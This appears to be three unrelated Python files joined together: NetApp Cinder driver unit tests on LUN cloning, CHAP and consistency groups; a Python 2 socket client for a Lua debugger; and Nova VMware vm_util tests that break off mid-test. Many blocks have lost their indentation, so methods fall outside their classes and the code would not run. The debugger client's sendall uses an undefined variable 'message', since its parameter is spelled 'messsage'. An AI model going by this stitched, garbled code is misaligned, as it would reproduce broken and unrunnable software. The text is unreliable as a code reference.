        mock_get_lun_block_count.assert_called_once_with(fake.LUN_PATH)
        mock_create_lun.assert_called_once_with(
            'vol0', new_lun_name, new_lun_size, fake.LUN_METADATA,
            qos_policy_group_name=fake.QOS_POLICY_GROUP_NAME)
        mock_clone_lun.assert_called_once_with(
            fake.LUN_NAME, new_lun_name, block_count=block_count)
        self.assertFalse(mock_post_sub_clone_resize.called)
        # The partially created LUN must be destroyed on failure.
        mock_destroy_lun.assert_called_once_with(new_lun_path)
def test_configure_chap_generate_username_and_password(self):
"""Ensure that a CHAP username and password are generated."""
initiator_name = fake.ISCSI_CONNECTOR['initiator']
username, password = self.library._configure_chap(initiator_name)
self.assertEqual(na_utils.DEFAULT_CHAP_USER_NAME, username)
self.assertIsNotNone(password)
self.assertEqual(len(password), na_utils.CHAP_SECRET_LENGTH)
def test_add_chap_properties(self):
"""Ensure that CHAP properties are added to the properties dictionary
"""
properties = {'data': {}}
self.library._add_chap_properties(properties, 'user1', 'pass1')
data = properties['data']
self.assertEqual('CHAP', data['auth_method'])
self.assertEqual('user1', data['auth_username'])
self.assertEqual('pass1', data['auth_password'])
self.assertEqual('CHAP', data['discovery_auth_method'])
self.assertEqual('user1', data['discovery_auth_username'])
self.assertEqual('pass1', data['discovery_auth_password'])
    def test_create_cgsnapshot(self):
        """create_cgsnapshot snapshots the pool and clones each member."""
        snapshot = fake.CG_SNAPSHOT
        # NOTE(review): this mutates the shared fake.CG_SNAPSHOT fixture in
        # place; tests running afterwards will see the added 'volume' key.
        snapshot['volume'] = fake.CG_VOLUME
        mock_extract_host = self.mock_object(
            volume_utils, 'extract_host',
            mock.Mock(return_value=fake.POOL_NAME))
        mock_clone_lun = self.mock_object(self.library, '_clone_lun')
        mock_busy = self.mock_object(self.library, '_handle_busy_snapshot')
        self.library.create_cgsnapshot(fake.CG_SNAPSHOT, [snapshot])
        mock_extract_host.assert_called_once_with(fake.CG_VOLUME['host'],
                                                  level='pool')
        self.zapi_client.create_cg_snapshot.assert_called_once_with(
            set([fake.POOL_NAME]), fake.CG_SNAPSHOT_ID)
        mock_clone_lun.assert_called_once_with(
            fake.CG_VOLUME_NAME, fake.CG_SNAPSHOT_NAME,
            source_snapshot=fake.CG_SNAPSHOT_ID)
        mock_busy.assert_called_once_with(fake.POOL_NAME, fake.CG_SNAPSHOT_ID)
def test_delete_cgsnapshot(self):
mock_delete_snapshot = self.mock_object(
self.library, '_delete_lun')
self.library.delete_cgsnapshot(fake.CG_SNAPSHOT, [fake.CG_SNAPSHOT])
mock_delete_snapshot.assert_called_once_with(fake.CG_SNAPSHOT['name'])
def test_delete_cgsnapshot_not_found(self):
self.mock_object(block_base, 'LOG')
self.mock_object(self.library, '_get_lun_attr',
mock.Mock(return_value=None))
self.library.delete_cgsnapshot(fake.CG_SNAPSHOT, [fake.CG_SNAPSHOT])
self.assertEqual(0, block_base.LOG.error.call_count)
self.assertEqual(1, block_base.LOG.warning.call_count)
self.assertEqual(0, block_base.LOG.info.call_count)
    def test_create_volume_with_cg(self):
        """Creating a volume inside a CG uses the CG LUN metadata."""
        volume_size_in_bytes = int(fake.CG_VOLUME_SIZE) * units.Gi
        self._create_volume_test_helper()
        self.library.create_volume(fake.CG_VOLUME)
        self.library._create_lun.assert_called_once_with(
            fake.POOL_NAME, fake.CG_VOLUME_NAME, volume_size_in_bytes,
            fake.CG_LUN_METADATA, None)
        self.assertEqual(0, self.library.
                         _mark_qos_policy_group_for_deletion.call_count)
        self.assertEqual(0, block_base.LOG.error.call_count)
def _create_volume_test_helper(self):
self.mock_object(na_utils, 'get_volume_extra_specs')
self.mock_object(na_utils, 'log_extra_spec_warnings')
self.mock_object(block_base, 'LOG')
self.mock_object(volume_utils, 'extract_host',
mock.Mock(return_value=fake.POOL_NAME))
self.mock_object(self.library, '_setup_qos_for_volume',
mock.Mock(return_value=None))
self.mock_object(self.library, '_create_lun')
self.mock_object(self.library, '_create_lun_handle')
self.mock_object(self.library, '_add_lun_to_table')
self.mock_object(self.library, '_mark_qos_policy_group_for_deletion')
def test_create_consistency_group(self):
model_update = self.library.create_consistencygroup(
fake.CONSISTENCY_GROUP)
self.assertEqual('available', model_update['status'])
    def test_delete_consistencygroup_volume_delete_failure(self):
        """A failed LUN delete flags the volume but not the whole group."""
        self.mock_object(block_base, 'LOG')
        self.mock_object(self.library, '_delete_lun',
                         mock.Mock(side_effect=Exception))
        model_update, volumes = self.library.delete_consistencygroup(
            fake.CONSISTENCY_GROUP, [fake.CG_VOLUME])
        # The group itself still transitions to 'deleted'; only the member
        # volume carries the error status, and the failure is logged once.
        self.assertEqual('deleted', model_update['status'])
        self.assertEqual('error_deleting', volumes[0]['status'])
        self.assertEqual(1, block_base.LOG.exception.call_count)
    def test_delete_consistencygroup_not_found(self):
        """Deleting a CG whose LUNs are already gone warns, not errors."""
        self.mock_object(block_base, 'LOG')
        self.mock_object(self.library, '_get_lun_attr',
                         mock.Mock(return_value=None))
        model_update, volumes = self.library.delete_consistencygroup(
            fake.CONSISTENCY_GROUP, [fake.CG_VOLUME])
        self.assertEqual(0, block_base.LOG.error.call_count)
        self.assertEqual(1, block_base.LOG.warning.call_count)
        self.assertEqual(0, block_base.LOG.info.call_count)
        # Both the group and its member volume end up 'deleted'.
        self.assertEqual('deleted', model_update['status'])
        self.assertEqual('deleted', volumes[0]['status'])
def test_create_consistencygroup_from_src_cg_snapshot(self):
mock_clone_source_to_destination = self.mock_object(
self.library, '_clone_source_to_destination')
self.library.create_consistencygroup_from_src(
fake.CONSISTENCY_GROUP, [fake.VOLUME], cgsnapshot=fake.CG_SNAPSHOT,
snapshots=[fake.CG_VOLUME_SNAPSHOT])
clone_source_to_destination_args = {
'name': fake.CG_SNAPSHOT['name'],
'size': fake.CG_SNAPSHOT['volume_size'],
}
mock_clone_source_to_destination.assert_called_once_with(
clone_source_to_destination_args, fake.VOLUME)
def test_create_consistencygroup_from_src_cg(self):
class fake_lun_name(object):
pass
fake_lun_name_instance = fake_lun_name()
fake_lun_name_instance.name = fake.SOURCE_CG_VOLUME['name']
self.mock_object(self.library, '_get_lun_from_table', mock.Mock(
return_value=fake_lun_name_instance)
)
mock_clone_source_to_destination = self.mock_object(
self.library, '_clone_source_to_destination')
self.library.create_consistencygroup_from_src(
fake.CONSISTENCY_GROUP, [fake.VOLUME],
source_cg=fake.SOURCE_CONSISTENCY_GROUP,
source_vols=[fake.SOURCE_CG_VOLUME])
clone_source_to_destination_args = {
'name': fake.SOURCE_CG_VOLUME['name'],
'size': fake.SOURCE_CG_VOLUME['size'],
}
mock_clone_source_to_destination.assert_called_once_with(
clone_source_to_destination_args, fake.VOLUME)
def test_handle_busy_snapshot(self):
self.mock_object(block_base, 'LOG')
mock_get_snapshot = self.mock_object(
self.zapi_client, 'get_snapshot',
mock.Mock(return_value=fake.SNAPSHOT)
)
self.library._handle_busy_snapshot(fake.FLEXVOL, fake.SNAPSHOT_NAME)
self.assertEqual(1, block_base.LOG.info.call_count)
mock_get_snapshot.assert_called_once_with(fake.FLEXVOL,
fake.SNAPSHOT_NAME)
| |
#!/usr/bin/env python
"""
A simple test client for the lua debugger.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Version:
Sri Panyam 05 Dec 2008
Initial version
"""
import os, sys
import re, string
import socket
import simplejson as json
import Queue, threading
def print_table(table_value, level = 1):
    """ Recursively pretty-prints a decoded lua table.

    table_value is a list of {'key': ..., 'value': ...} pairs as produced
    by the debug server; nested tables (type == "table" without a "raw"
    representation) are printed indented one extra level. """
    for kvpair in table_value:
        lKey = kvpair['key']
        lVal = kvpair['value']
        if lVal["type"] == "table" and "raw" not in lVal:
            print "%s[%s (%s)] -> " % (level * " ", str(lKey["value"]), str(lKey["type"]))
            print_table(lVal["value"], level + 1)
        else:
            print "%s[%s (%s)] -> %s : (%s)" % \
                  (level * " ",
                   str(lKey["value"]), str(lKey["type"]),
                   str(lVal["value"]), str(lVal["type"]))
def strip_quotes(x):
    """ Strips one leading and one trailing quote (single or double)
    from x, if present, and returns the result.

    Bug fix: previously an empty string (or a string that became empty
    after the leading quote was stripped, e.g. a lone quote character)
    raised an IndexError from the x[-1] access. """
    if not x:
        return x
    if x[0] == "'" or x[0] == '"':
        x = x[1:]
    if x and (x[-1] == "'" or x[-1] == '"'):
        x = x[:-1]
    return x
def tokenize(string):
    """ A simple tokenizer for getting contiguous runs of non-space,
    non-quote characters, or complete quoted strings (quotes included).

    Returns the list of matched tokens in order.  Note: the parameter
    deliberately keeps its historical name even though it shadows the
    imported 'string' module (unused here). """
    # Raw string literal: '\s' in a plain literal is an invalid escape
    # sequence (SyntaxWarning today, a hard error in future Pythons).
    exp = re.compile(r'([^\s"\']+)|("[^"]*")|(\'[^\']*\')')
    tokens = exp.finditer(string)
    return [token.group() for token in tokens]
class Debugger:
    """ The actual debugger front end. """
    # Prompt string shown on the interactive command line.
    PROMPT = "LDB: "
    def __init__(self, luahost = "localhost", luaport = 9999):
        # Index (into context_list) of the currently selected context.
        self.current_context = -1
        # Cached list of contexts as last reported by the server.
        self.context_list = []
        self.currContext = None
        self.currFrame = 0
        # Address of the lua debug server to connect to.
        self.luaHost = luahost
        self.luaPort = luaport
        # Monotonically increasing id attached to every outgoing message.
        self.msg_counter = 0
        self.messages = Queue.Queue()
        # Background client thread; server messages are delivered
        # asynchronously through message_callback.
        self.debugClient = DebugClient(self.message_callback)
    def __del__(self):
        self.disconnect()
    def do_prompt(self, prompt = PROMPT):
        """ Reads one stripped command line, or None once disconnected. """
        if self.debugClient.isAlive():
            return raw_input(prompt).strip()
        return None
    def run(self):
        """ Runs the command line loop. """
        if self.debugClient.isAlive():
            self.debugClient.disconnect()
        self.debugClient.connect(self.luaHost, self.luaPort)
        self.debugClient.start()
        try:
            input = self.do_prompt()
            while (input != None and input != "quit"):
                if input:
                    self.process_input(input)
                input = self.do_prompt()
        except:
            a, b, c = sys.exc_info()
            print "Exception at Debugger: ", a, b, dir(c)
        self.disconnect()
    def send_message(self, cmd, data = None):
        """ Sends a command to the server, tagged with a fresh message id. """
        self.msg_counter += 1
        self.debugClient.send_message(self.msg_counter, cmd, data)
    def process_input(self, input):
        """ Tokenizes one command line and dispatches it to its handler.

        Handlers are invoked with sending=True for user input; the same
        handlers are invoked again with sending=False when the matching
        reply arrives from the server (see message_callback). """
        args = tokenize(input)
        cmd = args[0]
        handler = self.get_command_handler(cmd)
        handler(cmd, args[1:], True)
    def get_command_handler(self, cmd):
        """ Maps a command name to its command_<name> method, falling back
        to invalid_command. """
        return getattr(self, "command_" + cmd, self.invalid_command)
    def disconnect(self):
        """ Stops the background client thread and closes the connection. """
        print "Stopping Debugger ..."
        self.debugClient.disconnect()
    def message_callback(self, data):
        """ Called (on the client thread) with each raw JSON message.

        Replies are routed back to the command handler that issued the
        original request (with sending=False); events go to handle_event. """
        # print "Decoding data: ", data
        decdata = json.decoder.JSONDecoder().decode(data)
        # print "Decoded data: ", decdata
        msgtype = decdata["type"]
        if msgtype == "Reply":
            # We are dealing with a reply instead of an event
            if 'code' not in decdata:
                print "Code not found in reply: ", decdata
                return
            if decdata['code'] != 0:
                print "Code: ", decdata['code'], " Error: ", decdata['value']
                return
            orig_msg = decdata["original"]
            handler = None
            command = None
            if 'cmd' in orig_msg:
                command = orig_msg['cmd']
            if command:
                handler = self.get_command_handler(command)
                if handler:
                    handler(command, decdata, False)
                else:
                    print "No handler found for command: %s" % command
        elif msgtype == "Event":
            self.handle_event(decdata["event"], decdata["data"])
        else:
            print "Invalid message type: ", msgtype, ", Data: ", decdata
    def handle_event(self, evt_name, evt_data):
        """ Handles an event from the server. """
        print ""
        print "Recieved Event: ", evt_name # , evt_data
        # Event-specific handling is not implemented yet.
        if evt_name == "ContextPaused":
            pass
        else:
            pass
    def command_breaks(self, command, data, sending):
        """
        Prints out a list of all breakpoints.
        Parameters:
            None
        """
        if sending:
            self.send_message("breaks")
        else:
            if 'value' not in data or not data['value']:
                print "No breakpoints set."
            else:
                bps = data['value']
                print ""
                print "Breakpoints: "
                print "============="
                for i in xrange(0, len(bps)):
                    if 'funcname' in bps[i]:
                        print "   %5d - Function: %s" % (i + 1, bps[i]['funcname'])
                    else:
                        print "   %5d - File: %s, Line: %d" % (i + 1, bps[i]['filename'], bps[i]['linenum'])
    def command_break(self, command, args, sending):
        """
        Sets a break point.
        Parameters:
            \\1   filename/function   File or Function where breakpoint is to be set
            \\2   linenumber          Line where the breakpoint is to be set
                                      (this implies breakpoint is a file
                                      breakpoint rather than a function
                                      breakpoint).
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            if len(args) == 1:
                data = {'funcname': args[0]}
            else:
                data = {'filename': "@" + args[0], 'linenum': int(args[1])}
            # print "Sending break command: ", data
            self.send_message("break", data)
        else:
            data = args
            print "Breakpoint successfully set at: ", data['original']['data']
    def command_clear(self, command, args, sending):
        """
        Clears a break point.
        Parameters:
            \\1   filename/function   File or Function where breakpoint is to be cleared
            \\2   linenumber          Line where the breakpoint is to be cleared
                                      (this implies breakpoint is a file
                                      breakpoint rather than a function
                                      breakpoint).
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            if len(args) == 1:
                data = {'funcname': args[0]}
            else:
                data = {'filename': args[0], 'linenum': int(args[1])}
            self.send_message("clear", data)
        else:
            data = args
            print "Breakpoint successfully cleared at: ", data
    def command_clearall(self, command, args, sending):
        """ Clears all breakpoints. """
        if sending:
            self.send_message("clearall")
        else: pass
    def command_step(self, command, args, sending):
        """ Single-steps (into calls) the context given as the argument. """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            self.send_message("step", {'context': args[0]})
        else: pass
    def command_next(self, command, args, sending):
        """ Steps over the next statement in the given context. """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            self.send_message("next", {'context': args[0]})
        else: pass
    def command_until(self, command, args, sending):
        # Not implemented yet.
        if sending: pass
        else: pass
    def command_finish(self, command, args, sending):
        """ Runs the given context until the current function returns. """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            self.send_message("finish", {'context': args[0]})
        else: pass
    def command_continue(self, command, args, sending):
        """
        Continues from a break point.
        Parameters:
            \\1   context   Address of the context to continue one.  See
                            the 'contexts' command for further info.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            self.send_message("continue", {'context': args[0]})
        else: pass
    def command_context(self, command, args, sending):
        """
        Sets the current context.  If no context is selected, the current
        context is printed.
        Parameters:
            \\1   index   Index of the context to be used as the current
                          context.  The contexts currently being debugged can
                          be obtained with the contexts command.
        """
        if len(args) > 0:
            self.current_context = int(args[0])
        if self.current_context < 0 or (not self.context_list):
            print "No contexts available. Please run the contexts command."
            return
        if self.current_context >= len(self.context_list):
            print "Invalid context index..."
            return
        print "Current Context: ", self.context_list[self.current_context]
    def command_contexts(self, command, args, sending):
        """ Lists (and caches) all contexts known to the server. """
        if sending:
            self.send_message("contexts")
        else:
            self.context_list = args["value"]
            if "noprint" not in args["original"]:
                print ""
                print "Contexts:"
                print "========="
                for ctx in self.context_list:
                    print "   Name: '%s', Addr: %s, Running: %s" % (ctx["name"], ctx["address"], str(ctx["running"]))
                    if (not ctx["running"]) and "location" in ctx:
                        print "       At: %s" % ctx["location"]
                print ""
    def command_reset(self, command, args, sending):
        """ Asks the server to reset the debugger state. """
        if sending:
            self.send_message("reset")
        else: pass
    def command_set(self, command, args, sending):
        # Not implemented yet.
        if sending: pass
        else: pass
    def command_eval(self, command, args, sending):
        """
        Evaluates an expression in a particular stack.
        Parameters:
            \\1   context    Address of the context where the expression is
                             to be evaluated.
            \\2   expr_str   Lua expression string to be evaluated.
        """
        if sending:
            if len(args) < 2:
                return self.print_help(command)
            self.send_message("eval", {'context': args[0], 'expr_str': strip_quotes(args[1])})
        else:
            data = args
            print "Result: ", data["value"]
    def command_local(self, command, args, sending):
        """
        Prints the value of a local variable in a given stack frame.
        Parameters:
            \\1   context   Address of the context whose local variables
                            are to be printed.
            \\2   lvindex   Optional.  The local variable index whose value
                            is to be extracted - Defaults to 1.
            \\3   nlevels   Optional.  Number of levels to recurse into the
                            variable - Defaults to 1.
            \\4   frame     Optional.  The frame whose LVs are to be
                            printed.  Defaults to 0.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            lvindex = 1
            nlevels = 1
            frame = 0
            if len(args) > 1:
                lvindex = int(args[1])
            if len(args) > 2:
                nlevels = int(args[2])
            if len(args) > 3:
                frame = int(args[3])
            self.send_message("local", {'context': args[0], 'frame': frame, 'lv': lvindex, 'nlevels': nlevels})
        else:
            results = args["value"]
            local_name = results["name"]
            local_type = results["type"]
            local_value = results["value"]
            print ""
            print "Name: %s, Type: " % local_name, local_type
            # Tables are rendered recursively; everything else prints inline.
            if local_type != "table":
                print "Value: ", local_value
            else:
                print_table(local_value)
    def command_locals(self, command, args, sending):
        """
        Prints all local variables in a given stack frame.
        Parameters:
            \\1   context   Address of the context whose local variables
                            are to be printed.
            \\2   frame     Optional.  The frame whose LVs are to be
                            printed.  Defaults to 0.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            if len(args) > 1: frame = int(args[1])
            else: frame = 0
            self.send_message("locals", {'context': args[0], 'frame': frame})
        else:
            print ""
            print "Locals:"
            print "======="
            for lv in args["value"]:
                print "   Name: '%s'" % (lv)
            print ""
    def command_upval(self, command, args, sending):
        """
        Prints the value of a local variable in a given stack frame.
        Parameters:
            \\1   context   Address of the context whose local variables
                            are to be printed.
            \\2   uvindex   Optional.  Function index.  Defaults to 1.
            \\3   uvindex   Optional.  The local variable index whose value
                            is to be extracted - Defaults to 1.
            \\4   nlevels   Optional.  Number of levels to recurse into the
                            variable - Defaults to 1.
            \\5   frame     Optional.  The frame whose LVs are to be
                            printed.  Defaults to 0.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            funcindex = 1
            uvindex = 1
            nlevels = 1
            frame = 0
            if len(args) > 1:
                uvindex = int(args[1])
            if len(args) > 2:
                nlevels = int(args[2])
            if len(args) > 3:
                frame = int(args[3])
            if len(args) > 4:
                funcindex = int(args[4])
            self.send_message("upval", {'context': args[0], 'frame': frame,
                                        'uv': uvindex, 'nlevels': nlevels, 'func': funcindex})
        else:
            results = args["value"]
            local_name = results["name"]
            local_type = results["type"]
            local_value = results["value"]
            print ""
            print "Name: %s, Type: " % local_name, local_type
            if local_type != "table":
                print "Value: ", local_value
            else:
                print_table(local_value)
    def command_upvals(self, command, args, sending):
        """
        Prints all local variables in a given stack frame.
        Parameters:
            \\1   context   Address of the context whose local variables
                            are to be printed.
            \\2   frame     Optional.  The frame whose LVs are to be
                            printed.  Defaults to 0.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            if len(args) > 1: frame = int(args[1])
            else: frame = 0
            self.send_message("upvals", {'context': args[0], 'frame': frame})
        else:
            print ""
            print "UpValues:"
            print "========="
            for lv in args["value"]:
                print "   Name: '%s'" % (lv)
            print ""
    def command_frame(self, command, args, sending):
        """
        Sets the selected frame as the active frame of the current context.
        This is only valid if the context is being debugged.
        """
        if self.current_context < 0 or self.current_context >= len(self.context_list):
            print "No context selected. Please run the context command to select a context ..."
            return
        if self.context_list[self.current_context]["running"]:
            print "Context is not paused. Frame cannot be selected."
            return
    def command_print(self, command, args, sending):
        # Not implemented yet.
        if sending: pass
        else: pass
    def command_list(self, command, args, sending):
        # Not implemented yet.
        if sending: pass
        else: pass
    def command_file(self, command, args, sending):
        """
        Retrieves contents of a file in a given range.
        Parameters:
            \\1   filename
            \\2   firstline (optional - default 1)
            \\3   lastline  (optional - default -1 => last line of the file)
        Returns (via callback):
            List of lines from the file in a given range.
        """
        if sending:
            if len(args) == 0:
                return self.print_help(command)
            data = {'file': args[0]}
            if len(args) > 1:
                data['first'] = int(args[1])
            if len(args) > 2:
                data['last'] = int(args[2])
            self.send_message("file", data)
        else:
            data = args
            orig = data['original']
            file = orig['data']['file']
            first = 1
            if 'first' in orig['data']: first = orig['data']['first']
            lines = data['value']
            print " --- %s >>" % file
            for i in xrange(0, len(lines)):
                print " %5d > %s" % (first + i, lines[i])
    def command_help(self, command, args, sending):
        """ Prints help for one command, or the full command list. """
        if args:
            self.print_help(args[0])
        else:
            self.print_help()
    def invalid_command(self, command, args, sending):
        """ Fallback handler for unrecognised commands. """
        print "Invalid command: %s" % command
        self.print_help(command, args)
    def print_help(self, command = None, args = []):
        """ Prints the docstring of a single command, or of every
        command_* method on the class when no command is given.

        NOTE(review): the mutable default for 'args' is shared across
        calls, but it is never mutated here so it is harmless. """
        handler = self.invalid_command
        if command:
            handler = self.get_command_handler(command)
        if handler != self.invalid_command:
            print "%s" % command
            if handler.__doc__:
                print handler.__doc__
            else:
                print "No help docs for this command yet."
        else:
            cmdlen = len("command_")
            print "Command List: "
            for (item, value) in Debugger.__dict__.items():
                if item.startswith("command_"):
                    cmdname = item[cmdlen : ]
                    handler = self.get_command_handler(cmdname)
                    print "    %s" % cmdname
                    if handler.__doc__:
                        print handler.__doc__
class DebugClient(threading.Thread):
""" A class that simply manages connections to the server and sends and
recives messages. """
MSG_WAITALL = 0x100
def sendall(self, messsage, msglen = None):
totalsent = 0
if msglen is None: msglen = len(message)
while totalsent < msglen:
sent = self.serverSocket.send(message[totalsent:])
if sent == 0:
raise RuntimeError, "Socket connection broken"
totalsent += sent
def recieveall(self, msglen):
msg = ""
while len(msg) < msglen:
chunk = self.serverSocket.recv(msglen - len(msg))
if chunk == "":
raise RuntimeError, "Socket connection broken"
msg += chunk
return msg
def __init__(self, msg_callback = None):
self.serverSocket = None
self.stopped = False
if msg_callback is not None:
self.msg_callback = msg_callback
else:
self.msg_callback = self.default_msg_callback
threading.Thread.__init__(self)
def default_msg_callback(self, data):
print "Recieved: ", data
def __del__(self):
self.disconnect()
def connect(self, host = "localhost", port = 9999):
""" Connect to the debug server. """
if self.isAlive():
self.disconnect()
self.serverSocket = socket.socket()
self.serverSocket.connect((host, port))
def disconnect(self):
""" Disconnect from the server. """
if self.isAlive():
print "Disconnecting from server ..."
self.stopped = True
if self.serverSocket:
print "Closing server socket..."
self.serverSocket.shutdown(socket.SHUT_RDWR)
self.serverSocket.close()
self.serverSocket = None
if self.isAlive():
self.join()
def run(self):
""" Thread callback function. """
self.stopped = False
if self.serverSocket is None:
print "Debug client has not been started. Please 'connect' first."
return
while self.serverSocket is not None and not self.stopped:
try:
data = self.read_string()
if data:
self.msg_callback(data)
else:
print "Server closed connection."
return
except:
a, b, c = sys.exc_info()
print "Exception at DebugClient: ", a, b, dir(c)
return
def read_string(self):
data = self.serverSocket.recv(4, DebugClient.MSG_WAITALL)
if len(data) == 4:
datalen = ((ord(data[0]) & 0xff)) | \
((ord(data[1]) & 0xff) << 8) | \
((ord(data[2]) & 0xff) << 16) | \
((ord(data[3]) & 0xff) << 24)
return self.serverSocket.recv(datalen, DebugClient.MSG_WAITALL)
return None
def send_message(self, id, msg_type, msg_data = None):
obj_str = json.encoder.JSONEncoder().encode({'id': id, 'cmd': msg_type, 'data': msg_data})
self.send_string(obj_str)
def send_string(self, s):
""" Sends a string s to the server. """
string_bytes = s # bytearray(s)
length = len(string_bytes)
size = chr(length & 0xff) + \
chr((length >> 8) & 0xff) + \
chr((length >> 16) & 0xff) + \
chr((length >> 24) & 0xff)
self.serverSocket.send(size)
self.serverSocket.send(string_bytes)
def run(host = "localhost", port = 9999):
    """ Creates a Debugger bound to host:port and enters its command loop. """
    debugger = Debugger(host, port)
    debugger.run()
def usage():
    """ Prints command line usage for this script. """
    print "Usage: python client.py run <host> <port>"
    print "       host and port are optional and default to "
    print "       localhost and 9999 respectively."
if __name__ == "__main__":
    # Entry point: "python client.py run [host [port]]".
    host = "localhost"
    port = 9999
    try:
        if sys.argv[1] == "run":
            if len(sys.argv) > 2:
                host = sys.argv[2]
            if len(sys.argv) > 3:
                port = int(sys.argv[3])
    except:
        # Missing/invalid arguments (IndexError or ValueError):
        # show usage and quit.
        usage()
        sys.exit()
    run(host, port)
| |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2013 Canonical Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import re
from nova import exception
from nova.openstack.common.gettextutils import _
from nova import test
from nova.virt.vmwareapi import fake
from nova.virt.vmwareapi import vm_util
class fake_session(object):
    """Fake VMware API session whose _call_method always returns the
    canned value supplied at construction time."""

    def __init__(self, ret=None):
        self.ret = ret

    def _call_method(self, *unused_args):
        return self.ret
class partialObject(object):
    """Fake partial retrieve result carrying a path and an empty fault."""
    def __init__(self, path='fake-path'):
        self.path = path
        self.fault = fake.DataObject()
class VMwareVMUtilTestCase(test.NoDBTestCase):
    def setUp(self):
        """Reset the shared fake VMware API state before each test."""
        super(VMwareVMUtilTestCase, self).setUp()
        fake.reset()
    def tearDown(self):
        """Reset the shared fake VMware API state after each test."""
        super(VMwareVMUtilTestCase, self).tearDown()
        fake.reset()
def test_get_datastore_ref_and_name(self):
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore())
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects))
self.assertEquals(result[1], "fake-ds")
self.assertEquals(result[2], 1024 * 1024 * 1024 * 1024)
self.assertEquals(result[3], 1024 * 1024 * 500 * 1024)
def test_get_datastore_ref_and_name_with_regex(self):
# Test with a regex that matches with a datastore
datastore_valid_regex = re.compile("^openstack.*\d$")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None, datastore_valid_regex)
self.assertEquals("openstack-ds0", result[1])
def test_get_datastore_ref_and_name_with_list(self):
# Test with a regex containing whitelist of datastores
datastore_valid_regex = re.compile("(openstack-ds0|openstack-ds2)")
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("openstack-ds0"))
fake_objects.add_object(fake.Datastore("openstack-ds1"))
fake_objects.add_object(fake.Datastore("openstack-ds2"))
result = vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None, datastore_valid_regex)
self.assertNotEquals("openstack-ds1", result[1])
def test_get_datastore_ref_and_name_with_regex_error(self):
# Test with a regex that has no match
# Checks if code raises DatastoreNotFound with a specific message
datastore_invalid_regex = re.compile("unknown-ds")
exp_message = (_("Datastore regex %s did not match any datastores")
% datastore_invalid_regex.pattern)
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake.Datastore("fake-ds0"))
fake_objects.add_object(fake.Datastore("fake-ds1"))
# assertRaisesRegExp would have been a good choice instead of
# try/catch block, but it's available only from Py 2.7.
try:
vm_util.get_datastore_ref_and_name(
fake_session(fake_objects), None, None,
datastore_invalid_regex)
except exception.DatastoreNotFound as e:
self.assertEquals(exp_message, e.args[0])
else:
self.fail("DatastoreNotFound Exception was not raised with "
"message: %s" % exp_message)
def test_get_datastore_ref_and_name_without_datastore(self):
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(), host="fake-host")
self.assertRaises(exception.DatastoreNotFound,
vm_util.get_datastore_ref_and_name,
fake_session(), cluster="fake-cluster")
def test_get_host_ref_from_id(self):
fake_host_name = "ha-host"
fake_host_sys = fake.HostSystem(fake_host_name)
fake_host_id = fake_host_sys.obj.value
fake_objects = fake.FakeRetrieveResult()
fake_objects.add_object(fake_host_sys)
ref = vm_util.get_host_ref_from_id(
fake_session(fake_objects), fake_host_id, ['name'])
self.assertIsInstance(ref, fake.HostSystem)
self.assertEqual(fake_host_id, ref.obj.value)
host_name = vm_util.get_host_name_from_host_ref(ref)
self.assertEquals(fake_host_name, host_name)
    def test_get_host_ref_no_hosts_in_cluster(self):
        # An empty session result models a cluster without hosts.
        self.assertRaises(exception.NoValidHost,
                          vm_util.get_host_ref,
                          fake_session(""), 'fake_cluster')
    def test_get_datastore_ref_and_name_no_host_in_cluster(self):
        # No hosts in the cluster implies no datastores either.
        self.assertRaises(exception.DatastoreNotFound,
                          vm_util.get_datastore_ref_and_name,
                          fake_session(""), 'fake_cluster')
    def test_get_host_name_for_vm(self):
        # Look a VM up by name, then resolve its runtime host id through
        # the returned vm_ref; both lookups go through the fake session.
        fake_host = fake.HostSystem()
        fake_host_id = fake_host.obj.value
        fake_vm = fake.VirtualMachine(name='vm-123',
                                      runtime_host=fake_host.obj)
        fake_objects = fake.FakeRetrieveResult()
        fake_objects.add_object(fake_vm)
        vm_ref = vm_util.get_vm_ref_from_name(
            fake_session(fake_objects), 'vm-123')
        self.assertIsNotNone(vm_ref)
        host_id = vm_util.get_host_id_from_vm_ref(
            fake_session(fake_objects), vm_ref)
        self.assertEqual(fake_host_id, host_id)
    def test_property_from_property_set(self):
        # property_from_property_set should return the first property
        # whose name matches, searching objects in order; missing names
        # yield None, and the raw 'val' is returned unchanged.
        ObjectContent = collections.namedtuple('ObjectContent', ['propSet'])
        DynamicProperty = collections.namedtuple('Property', ['name', 'val'])
